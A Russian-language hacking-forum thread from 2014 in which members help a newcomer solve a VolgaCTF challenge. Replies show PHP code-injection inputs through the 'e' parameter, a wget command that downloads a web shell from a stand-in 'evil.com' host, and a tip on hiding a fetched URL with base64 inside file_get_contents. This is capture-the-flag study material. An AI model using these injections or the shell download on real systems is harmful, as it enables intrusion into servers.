HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Задания/Квесты/CTF/Конкурсы
Перезагрузить страницу Помогите с поиском флага
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.03.2014, 12:35
markelpkr
Новичок
Регистрация: 16.03.2014
Сообщений: 2
С нами: 6400406

Репутация: 0
По умолчанию
Добрый день античатовцы, помогите пожалуйста найти флаг)

http://tasks.2014.volgactf.ru:28103/
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 30.03.2014, 12:38
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
С нами: 9157119

Репутация: 74
По умолчанию
Какая-то ссылка подозрительная. Не пойду.
 
Ответить с цитированием

  #3  
Старый 30.03.2014, 13:59
Toxa33rus
Познающий
Регистрация: 31.03.2012
Сообщений: 41
С нами: 7430006

Репутация: 0
По умолчанию
Цитата:
Сообщение от fl00der  
Какая-то ссылка подозрительная. Не пойду.
Там открывается вот это:

Notice: Undefined index: e in /var/www/index.php on line 3

Куда е дели? Третья строка негодует)
 
Ответить с цитированием

  #4  
Старый 30.03.2014, 14:13
markelpkr
Новичок
Регистрация: 16.03.2014
Сообщений: 2
С нами: 6400406

Репутация: 0
По умолчанию
есть подсказка /?e=echo pi
 
Ответить с цитированием

  #5  
Старый 30.03.2014, 15:46
Fepsis
Постоянный
Регистрация: 17.09.2008
Сообщений: 562
С нами: 9288386

Репутация: 536


По умолчанию
Цитата:
Сообщение от markelpkr  
есть подсказка /?e=echo pi
e=echo pi - выводит результат функции pi()

http://www.php.su/functions/?pi

соответственно e=echo functionname выведет результат functionname()

например http://tasks.2014.volgactf.ru:28103/?e=echo+phpinfo;

На этом мои знания заканчиваются, да и не честно так ))
 
Ответить с цитированием

  #6  
Старый 30.03.2014, 17:14
Unknown
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами: 10992741

Репутация: 0
По умолчанию
У тебя на прямую выполняется:

_ttp://tasks.2014.volgactf.ru:28103/?e=phpinfo();

классика же:

Код:
wget -o test.php http://evil.com/sh.txt
 
Ответить с цитированием

  #7  
Старый 02.05.2014, 15:29
-=Cerberus=-
Познавший АНТИЧАТ
Регистрация: 29.04.2012
Сообщений: 1,266
С нами: 7388246

Репутация: 391


По умолчанию
или этой функцией http://www.php.net/manual/ru/function.file-get-contents.php

при необходимости урл можно закодировать в базу64 и дергать в file_get_contents через base64_decode
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.